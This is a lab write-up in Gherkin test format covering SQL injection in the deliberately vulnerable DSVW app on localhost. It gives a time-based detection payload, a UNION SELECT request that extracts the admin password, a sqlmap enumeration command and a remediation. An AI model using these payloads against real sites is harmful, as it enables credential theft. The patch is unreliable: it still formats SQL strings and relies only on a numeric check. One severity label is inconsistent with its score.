## Version 1.4.1
## language: en

Feature:
  TOE:
    dsvw
  Category:
    SQL Injection
  Location:
    http://127.0.0.1:65412/?id - id (field)
  CWE:
    CWE-89: Improper Neutralization of Special Elements used
    in an SQL Command ('SQL Injection')
  Rule:
    REQ.173: https://fluidattacks.com/web/rules/173/
  Goal:
    Verify if the site is vulnerable to SQL Injection
  Recommendation:
    Use prepared SQL statements and sanitize inputs

  Background:
  Hacker's software:
    | <Software name> | <Version>   |
    | Ubuntu          | 18.04.3 LTS |
    | Firefox         | 71.0        |
    | Sqlmap          | 1.2.4       |
  TOE information:
    Given The site
    And The server is running BaseHTTP version 0.6
    And Python version 3.6.9
    And SQLite version 3

  Scenario: Normal use case
    Given The site with the id parameter
    """
    http://127.0.0.1:65412/?id=1
    """
    Then the site returns information of user with id 1
    """
    id  username  name   surname
    1   admin     admin  admin
    """

  Scenario: Static detection
    Given The source code from "dsvw.py"
    When I search for the SQL query inside the code
    """
    cursor.execute("SELECT id, username, name, surname
    FROM users WHERE id=" + params["id"])
    """
    Then The parameter is concatenated inside the query
    And I have a SQL injection vulnerability in general

  Scenario: Dynamic detection
    Given The search bar
    When I put a single query inside the search bar
    Then the page returns the information of the user with id 2
    Then the id parameter is passed through the url
    When I try put a single query inside the URL
    """
    ?id=2 AND 1=randomblob(100000000)
    """
    Then I see the page sleeps a while
    And I can conclude that id parameter is a possible attack vector

  Scenario: Exploitation
    Given The vulnerability
    When I make the next request:
    """
    http://127.0.0.1:65412/?id=-1 UNION SELECT 1,2,3,password
    FROM users WHERE id=1
    """
    Then I get the password of admin user:
    """
    id  username  name  surname
    1   2         3     7en8aiDoh!
    """
    When I try to use the sqlmap command
    """
    sqlmap -u 'localhost:65412/?id=1' --tables
    """
    Then I get a message from information of the database
    And I can enumerate the database

  Scenario: Remediation
    Given The source code
    When I validate if the value of the variable is numeric
    Then I add the next code in source
    """
    label = str(params["id"])
    sql = "SELECT id, username, name, surname FROM users WHERE id= %s"
    if label.isnumeric():
      cursor.execute(sql % (label,))
    else:
      content += "<p>Please only numeric values</p>"
    """
    When I re-run my exploit with the same query
    """
    http://127.0.0.1:65412/?id=-1 UNION SELECT 1,2,3,password
    FROM users WHERE id=1
    """
    And the the site returns:
    """
    Please only numeric values
    """
    Then I can confirm that the vulnerability was successfully patched

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
    Base: Attributes that are constants over time and organizations
      8.5/10 (High) - AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    Temporal: Attributes that measure the exploit's popularity and fixability
      8.2/10 (High) - E:H/RL:O/RC:C/CR:H/IR:X/AR:X
    Environmental: Unique and relevant attributes to a specific user environment
      9.1/10 (Medium) - MAV:N/MAC:L/MPR:N/MUI:N/MS:U/MC:H/MI:L/MA:L

  Scenario: Correlations
    No correlations have been found to this date 2019-12-19
